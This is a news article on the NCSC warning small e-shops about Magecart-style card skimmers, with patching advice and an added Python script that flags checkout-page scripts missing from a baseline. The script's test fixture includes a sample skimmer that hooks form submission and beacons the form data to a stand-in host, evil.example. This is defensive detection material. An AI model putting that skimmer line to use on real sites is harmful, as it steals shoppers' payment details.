Small businesses urged to protect their customers from card skimming
With Black Friday and Cyber Monday quickly approaching, the UK National Cyber Security Centre (NCSC) is urging small online shops to protect their customers from card skimming cyber criminals.
Through its Active Cyber Defence programme, the NCSC has this year already notified 4,151 small businesses that their sites had been compromised to steal customers’ payment details, and is now advising the rest to be on the alert.
Online shops and card skimming: The extent of the problem
Card-skimming attacks happen year-round, but regularly increase in the run-up to the Christmas shopping season.
The criminals behind these (usually JavaScript) skimmers want to profit from the surge in online purchases, but they also want to avoid having their code detected before the shopping frenzy starts, so they often wait until the last possible moment to inject it into e-shops. Once injected, a skimmer runs in the shopper’s browser on the checkout page and copies payment details as they are entered, so neither the shop owner nor the customer sees anything unusual.
“We want small and medium-sized online retailers to know how to prevent their sites being exploited by opportunistic cyber criminals over the peak shopping period,” said Sarah Lyons, NCSC Deputy Director for Economy and Society.
“Falling victim to cyber crime could leave you and your customers out of pocket and cause reputational damage. It’s important to keep websites as secure as possible and I would urge all business owners to follow our guidance and make sure their software is up to date.”
The NCSC says that most of the skimmer-infected shops it identified had been compromised via a known vulnerability in Magento, an open-source e-commerce platform. Vulnerable Magento installations were for a long time the most popular target (it is how the Magecart criminal groups got their name), but attackers also go after sites built on other e-commerce and content management platforms, such as Drupal, WordPress and its WooCommerce plugin, and others.
Advice for retailers
To minimize the chance of their websites and online shops being compromised, administrators should keep their platform of choice and every add-on or extension they use up to date, and uninstall those they no longer need. Administrator accounts should be protected with unique, complex passwords and additionally with multi-factor authentication.
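Patching and account hygiene reduce the chance of an injection; the complementary check a shop operator can run is to watch the checkout page for scripts that were not there after the last clean deployment. The following Python script is an added example, not code from the NCSC, Magento or any of the resources named on this page: it fingerprints the `<script>` tags on a page (external ones by origin, inline ones by SHA-256 of their body) and diffs them against a baseline, so an injected skimmer shows up as a new entry either way. The sample HTML and the `evil.example` host are constructed for illustration.

```python
"""Baseline check for unexpected <script> tags on an e-shop page.

Added example; not NCSC, Magento or Malwarebytes code. Every external script
is recorded by its origin and every inline script by the SHA-256 of its body,
so a skimmer injected either way appears as a new entry compared with a
baseline taken from the known-good page. The sample HTML and the evil.example
host below are constructed for illustration.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ScriptCollector(HTMLParser):
    """Collects script origins and inline script bodies while parsing HTML."""

    def __init__(self):
        super().__init__()
        self.origins = []        # one entry per external <script src=...>
        self.inline_bodies = []  # one entry per inline <script>...</script>
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            parts = urlsplit(src)
            if not parts.netloc:
                origin = "same-origin"                  # e.g. /static/app.js
            elif parts.scheme:
                origin = f"{parts.scheme}://{parts.netloc}"
            else:
                origin = f"relative://{parts.netloc}"   # protocol-relative //host/x.js
            self.origins.append(origin)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline_bodies.append("".join(self._buf))
            self._in_inline = False


def fingerprint(html):
    """Return the sorted script origins and inline-script hashes found in html."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    return {
        "origins": sorted(set(collector.origins)),
        "inline_hashes": sorted(
            hashlib.sha256(body.strip().encode("utf-8")).hexdigest()
            for body in collector.inline_bodies
        ),
    }


def diff_against_baseline(html, baseline):
    """List script origins and inline hashes present in html but absent from baseline."""
    current = fingerprint(html)
    return {
        "new_origins": [o for o in current["origins"] if o not in baseline["origins"]],
        "new_inline_hashes": [
            h for h in current["inline_hashes"] if h not in baseline["inline_hashes"]
        ],
    }


# Constructed known-good checkout page, as captured after a clean deployment.
BASELINE_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.shop.example/vendor.min.js"></script>
<script>window.shopConfig = {"currency": "GBP"};</script>
</head><body><form id="checkout"><input id="cc" name="cc"></form></body></html>"""

# Constructed compromised version: the same page plus one protocol-relative
# external script and one inline script hooking form submission.
COMPROMISED_HTML = BASELINE_HTML.replace(
    "</head>",
    '<script src="//evil.example/j.js"></script>\n'
    '<script>window.addEventListener("submit", function (e) {'
    ' navigator.sendBeacon("//evil.example/c", new FormData(e.target)); });</script>\n'
    "</head>",
)

BASELINE = fingerprint(BASELINE_HTML)

if __name__ == "__main__":
    findings = diff_against_baseline(COMPROMISED_HTML, BASELINE)
    for origin in findings["new_origins"]:
        print("unexpected external script origin:", origin)
    for digest in findings["new_inline_hashes"]:
        print("unexpected inline script, sha256:", digest)
```

In practice the baseline is recorded right after a clean deployment and the check runs on a schedule against the live checkout page, with any finding treated as an incident until explained. Two caveats: the script only notices scripts that are added, so a tampered copy of an already-allowed third-party file (the CDN script above, say) goes undetected, which is what Subresource Integrity attributes on `<script>` tags are for; and it inspects only the HTML the server returns, not scripts that other scripts load at runtime.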
Retailers are also advised to consult the Cyber Resilience Toolkit for Retail published by the British Retail Consortium and the NCSC, and to use its advice to strengthen their cyber defences.
Malwarebytes has also recently offered (timely) advice on how to defend your website against card skimmers, and there are other helpful resources.